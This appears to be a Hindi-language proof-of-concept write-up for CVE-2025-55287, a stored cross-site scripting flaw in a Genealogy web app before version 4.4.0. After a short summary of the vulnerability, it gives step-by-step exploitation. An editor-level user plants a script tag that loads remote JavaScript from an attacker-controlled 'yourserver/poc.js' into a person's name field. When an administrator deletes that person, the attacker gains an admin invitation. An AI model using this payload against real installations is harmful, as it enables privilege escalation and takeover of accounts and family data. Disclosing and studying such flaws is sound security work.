CVE-2025-55287-POC
Genealogy ऐप में प्रमाणित स्टोर क्रॉस-साइट स्क्रिप्टिंग (XSS) जो 4.4.0 से पहले के संस्करणों को प्रभावित करता है, मनमाना JavaScript निष्पादन और Editor+ भूमिका से प्रशासक तक विशेषाधिकार वृद्धि की अनुमति देता है।
सारांश
- भेद्यता प्रकार: स्टोर क्रॉस-साइट स्क्रिप्टिंग (CWE-79)
- प्रभावित घटक: 'Person' का प्रथम नाम और अंतिम नाम।
- प्रभावित संस्करण: 4.4.0 से पहले के सभी संस्करण
- प्रभाव: पीड़ितों के ब्राउज़र में हमलावर द्वारा आपूर्ति किए गए JavaScript का स्थायी निष्पादन; सत्र अपहरण, DOM के माध्यम से CSRF, UI रिड्रेस, क्रेडेंशियल चोरी, या पीड़ित के रूप में मनमानी कार्रवाई।
- आक्रमण वेक्टर: प्रमाणित (नया व्यक्ति बनाने की भूमिका वाला कोई भी - editor+)
शोषण
मूल कारण: उच्च विशेषाधिकार वाले उपयोगकर्ता द्वारा प्रभावित व्यक्ति को सफलतापूर्वक हटाने पर व्यक्ति के प्रथम नाम/अंतिम नाम का अपर्याप्त सर्वर-साइड सैनिटाइज़ेशन/एन्कोडिंग।
PoC:
- एप्लिकेशन में प्रमाणित करें (editor+ भूमिका)।
- एक नया व्यक्ति बनाएं (जरूरी नहीं कि वह किसी परिवार को सौंपा गया हो)।
- जोड़े गए व्यक्ति के प्रथम नाम या अंतिम नाम में JavaScript शामिल करें:
<script src='yourserver/poc.js'></script>
- placeholder में अपने ईमेल पते के साथ poc.js को संपादित करें।
- जब कोई विशेषाधिकार प्राप्त उपयोगकर्ता नव निर्मित व्यक्ति को हटाने का प्रयास करेगा, तो आपको प्रदान किए गए ईमेल पते पर प्रशासक की भूमिका के साथ प्लेटफ़ॉर्म पर एक आमंत्रण प्राप्त होगा।